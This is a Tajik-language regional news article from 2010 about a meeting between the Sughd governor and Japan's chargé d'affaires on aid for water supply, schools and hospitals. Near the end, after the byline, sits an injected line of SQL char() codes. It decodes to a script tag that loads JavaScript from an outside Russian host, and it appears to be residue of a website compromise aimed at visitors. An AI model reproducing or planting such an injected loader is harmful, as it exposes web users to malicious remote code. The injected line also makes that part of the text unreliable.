18.06.2010
Ҳамкориҳои Ҷопон бо вилояти Суғд
Дирӯз, Раиси вилояти Суғд, муовини аввали Раиси Маҷлиси миллии Маҷлиси Олии Ҷумҳурии Тоҷикистон Қоҳир Расулзода кордори сафорати Ҷопон дар Ҷумҳурии Тоҷикистон ҷаноби Йошихиро Накаямаро ба ҳузур пазируфт.
Бино ба иттилои Маркази иттилоот ва таҳлили Раиси вилоят ҳини сӯҳбат омодагии минтақаро ҷиҳати ҳамкорӣ бо Ҷопон баён доштанд ва ҳамчунин, ҷонибҳо оид ба рушди ҳамкорӣ дар соҳаҳои мухталиф манфиатдор будани худро таъкид намуданд.
Зикр гардид, ки аз соли 2002 аз ҷониби Ҷопон барои рушди соҳаҳои гуонун дар вилоят ба маблағи 3 миллион доллари амрикоӣ маблағгузорӣ шудааст.
Ҳамзамон, Раиси вилоят Қоҳир Расулзода изҳор доштааст, ки соли равон бо супориши Президенти Ҷумҳурии Тоҷикистон аз ҷониби Раиси вилояти Суғд аз оғози соли равон қабули шаҳрвандон дар шаҳру навоҳии вилоят баргузор гардида, то имрӯз дар 9 шаҳру ноҳияҳо наздик 2 ҳазор аҳолӣ қабул шудаанд.
Қоҳир Расулзода афзудааст, ки аз муроҷиати шаҳрвандон бар меояд, ки мушкилии асосии мардум таъминот бо оби нӯшокиву полезӣ, таъмири муассисаҳои таълимиву тандурустӣ мебошад.
Дар ин замина, боз пешниҳод гардид, ки барои таъмин намудани аҳолии шаҳру навоҳии вилоят бо оби нӯшокӣ ҳамкориҳо вусъат бахшида шаванд.
Дар навбати худ кордори сафорати Ҷопон дар Ҷумҳурии Тоҷикистон ҷаноби Йошихиро Накаяма зикр дошт, ки алҳол аз ҷониби ҳукумати Ҷопон дар Тоҷикистон якчанд лоиҳаҳо омода шудаанд. Мавсуф гуфт, ки аз ҷумла дар шаҳру навоҳии вилоят таи солҳои охир чандин лоиҳаҳо оид ба таъмири муассисаҳои таълимиву тандурустӣ, барқарор сохтани каналҳо, харидорӣ намудани таҷҳизот ва дастгоҳҳо барои беморхонаҳо ва ғайра амалӣ гаштанд. Ҳамзамон, номбурда изҳор дошт, ки Ҳукумати Ҷопон дар оянда низ барои вусъат бахшидани ҳамкориҳо бо Ҷумҳурии Тоҷикистон, аз ҷумла вилояти Суғд омода аст.
Зимни сӯҳбат, ҷонибҳо доир ба дигар масъалаҳои мавриди таваҷҷӯҳи тарафҳо мубодилаи афкор намуданд.
Ёдовар мешавем, ки кордори сафорати Ҷопон дар Ҷумҳурии Тоҷикистон ҷаноби Йошихиро Накаяма ба вилояти Суғд аз санаи 14-уми июни соли равон ташриф овардааст.
Ҷамшед МАЪРУФ

char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)5b882dddecac6eff88c7e19207f5a31b.js" type="text/javascript">

ТАВЗЕҲОТ